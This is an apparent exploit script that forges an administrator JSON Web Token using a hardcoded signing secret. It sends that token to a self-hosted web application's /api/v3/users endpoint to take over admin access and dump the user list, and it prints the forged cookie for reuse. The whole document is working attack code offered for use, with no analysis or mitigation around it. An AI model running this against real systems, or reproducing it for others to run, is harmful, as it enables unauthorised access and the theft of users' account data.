### Discovery: Omri Baso & Fabien Aunay ### Exploit Author: Omri Baso try: import jwt except ImportError: print("\n[-] python3 -m pip install jwt") sys.exit(1) import sys import requests from datetime import datetime, timedelta, timezone from jwt.utils import get_int_from_datetime from jwt.jwk import OctetJWK def main(): if len(sys.argv) < 2: print("\n[-] Usage: %s %s " % (sys.executable,sys.argv[0])) print("Example:\n\t%s %s http://127.0.0.1:9080/" % (sys.executable,sys.argv[0])) sys.exit(1) target = sys.argv[1] try: key = OctetJWK(b"167f0db2-f83e-4baa-9736-d56064a5b415") except Exception: print("\n[-] python3 -m pip uninstall PyJWT") print("\n[-] python3 -m pip install jwt") print("\n[-] Exploit is not written using PyJWT!") sys.exit(1) message = {"username":"admin" ,"useradmin": True,"usergroup":"admin","externalauth": False,"externaltype":"","displayname":"Homer Admin","avatar":"/etc/passwd", 'exp': get_int_from_datetime(datetime.now(timezone.utc) + timedelta(hours=24)), } instance = jwt.JWT() print("\n\n[+] Generating the following cookie: \n\n%s\n\n" % message) admin_cookie = instance.encode(message, key, alg='HS256') if(admin_cookie): if not (target.endswith("/")): target += "/" headers = {'Authorization': 'Bearer %s' % admin_cookie} target = target + "api/v3/users" headers = {"Accept": "application/json, text/plain, */*", "Authorization": "Bearer %s" % admin_cookie, "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", "Referer": "%spreference/users" % target, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} r = requests.get(target, headers=headers) if(r.status_code == 201): print("[+] Obtained Admin access!!\n") print("\n\n[+] Dumping Users\n\n") print("----------------------------------------------") print(r.text) print("\n[+] Admin Cookie: \n%s" % admin_cookie) else: print("[-] failed") print(r.text) main()